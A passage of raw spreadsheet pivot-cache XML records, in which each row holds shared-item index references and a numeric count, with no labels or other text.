  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="614"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="13"/>
    <x v="614"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="614"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="614"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="615"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="615"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="59"/>
    <x v="615"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="16"/>
    <x v="615"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="615"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="615"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="615"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="609"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="609"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="616"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="616"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="616"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="617"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="617"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="617"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="617"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="617"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="617"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="618"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="618"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="618"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="618"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="618"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="618"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="618"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="619"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="619"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="619"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="619"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="619"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="620"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="620"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="4"/>
    <x v="620"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="620"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="620"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="620"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="620"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="620"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="620"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="620"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="620"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="620"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="620"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="620"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="621"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="621"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="621"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="621"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="621"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="621"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="621"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="621"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="621"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="621"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="43"/>
    <x v="621"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="312"/>
    <x v="621"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="621"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="621"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="622"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="622"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="622"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="622"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="622"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="622"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="622"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="623"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="623"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="623"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="623"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="623"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="623"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="623"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="624"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="624"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="624"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="624"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="624"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="624"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="624"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="625"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="625"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="625"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="625"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="50"/>
    <x v="625"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="23"/>
    <x v="625"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="44"/>
    <x v="625"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="34"/>
    <x v="625"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="625"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="625"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="37"/>
    <x v="625"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="57"/>
    <x v="625"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="625"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="625"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="626"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="626"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="626"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="626"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="626"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="626"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="627"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="627"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="627"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="627"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="627"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="24"/>
    <x v="627"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="621"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="621"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="621"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="621"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="86"/>
    <x v="621"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="568"/>
    <x v="621"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="628"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="628"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="628"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="628"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="628"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="628"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="628"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="628"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="629"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="629"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="629"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="629"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="629"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="629"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="629"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="630"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="630"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="630"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="630"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="630"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="630"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="631"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="631"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="631"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="631"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="631"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="631"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="632"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="632"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="632"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="632"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="632"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="632"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="633"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="633"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="633"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="633"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="633"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="633"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="633"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="634"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="634"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="634"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="44"/>
    <x v="634"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="31"/>
    <x v="634"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="634"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="634"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="635"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="635"/>
  </r>
